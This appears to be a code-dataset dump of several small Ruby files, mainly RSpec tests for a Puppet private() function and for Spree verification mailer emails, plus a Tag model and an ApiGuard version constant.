bba57dc94644d24ced57ce82f0f4cb9f22e9dc4f | 2,269 | #! /usr/bin/env ruby -S rspec
require 'spec_helper'
describe Puppet::Parser::Functions.function(:private) do
let(:scope) { PuppetlabsSpec::PuppetInternals.scope }
subject do
function_name = Puppet::Parser::Functions.function(:private)
scope.method(function_name)
end
it 'should issue a warning' do
scope.expects(:warning).with("private() DEPRECATED: This function will cease to function on Puppet 4; please use assert_private() before upgrading to puppet 4 for backwards-compatibility, or migrate to the new parser's typing system.")
subject.call []
end
context "when called from inside module" do
it "should not fail" do
scope.expects(:lookupvar).with('module_name').returns('foo')
scope.expects(:lookupvar).with('caller_module_name').returns('foo')
expect {
subject.call []
}.not_to raise_error
end
end
context "with an explicit failure message" do
it "prints the failure message on error" do
scope.expects(:lookupvar).with('module_name').returns('foo')
scope.expects(:lookupvar).with('caller_module_name').returns('bar')
expect {
subject.call ['failure message!']
}.to raise_error Puppet::ParseError, /failure message!/
end
end
context "when called from private class" do
it "should fail with a class error message" do
scope.expects(:lookupvar).with('module_name').returns('foo')
scope.expects(:lookupvar).with('caller_module_name').returns('bar')
scope.source.expects(:name).returns('foo::baz')
scope.source.expects(:type).returns('hostclass')
expect {
subject.call []
}.to raise_error Puppet::ParseError, /Class foo::baz is private/
end
end
context "when called from private definition" do
it "should fail with a class error message" do
scope.expects(:lookupvar).with('module_name').returns('foo')
scope.expects(:lookupvar).with('caller_module_name').returns('bar')
scope.source.expects(:name).returns('foo::baz')
scope.source.expects(:type).returns('definition')
expect {
subject.call []
}.to raise_error Puppet::ParseError, /Definition foo::baz is private/
end
end
end
| 37.196721 | 240 | 0.669899 |
f8ebefb6067eee2e0fbf6c2eaf6b5406453e7ca7 | 71 | # frozen_string_literal: true
module ApiGuard
VERSION = '0.4.2'
end
| 11.833333 | 29 | 0.732394 |
1a4f56420520e6f8d4c5514172bcd0d10ce8d027 | 124 | class Tag < ApplicationRecord
has_many :tag_relates, dependent: :destroy
has_many :data_sets, through: :tag_relates
end
| 24.8 | 44 | 0.790323 |
bf5745e6ca3016f4205b3cbb97b45e2bad7b0f0c | 32 | require "rps"
require "stringio" | 16 | 18 | 0.78125 |
26e21adfc385607076321c8f0828bbbbb9e592b7 | 1,856 | require 'spec_helper'
EMAILS = {
welcome_email: "successfully registered",
rejected_email: "is rejected",
verified_email: "successfully verified"
}
EMAILS.each do |key, value|
RSpec.shared_examples key do
it "has #{key} specific text in body" do
expect(body).to include(value)
end
it "has user's email in body" do
expect(body).to include("Hi")
expect(body).to include(user.email)
end
end
end
RSpec.shared_examples "verification mailer email" do |email_name|
it 'is sent from current store email address' do
expect(email.from).to eq([Spree::Store.current.mail_from_address])
end
it 'is sent to users email address' do
expect(email.to).to eq([user.email])
end
it 'subject contains store name' do
expect(email.subject).to include Spree::Store.current.name
end
it "subject contains #{email_name} specific text" do
expect(email.subject).to include Spree.t("verification_mailer.#{email_name}.subject")
end
context "text part of #{email_name}" do
include_examples email_name do
let(:body) { email.text_part.body.to_s }
end
end
context "html part of #{email_name}" do
include_examples email_name do
let(:body) { email.html_part.body.to_s }
end
end
end
describe Spree::VerificationMailer, type: :mailer do
before { create(:store) }
let(:user) { create(:user) }
EMAILS.each do |key, value|
context key.to_s.humanize do
let!(:email) { Spree::VerificationMailer.with(user: user).send(key) }
it_behaves_like "verification mailer email", key
end
end
context 'with preference :send_core_emails set to false' do
it 'sends no email' do
Spree::Config.set(:send_core_emails, false)
message = Spree::VerificationMailer.with(user: user).welcome_email
expect(message.body).to be_blank
end
end
end
| 26.514286 | 89 | 0.696659 |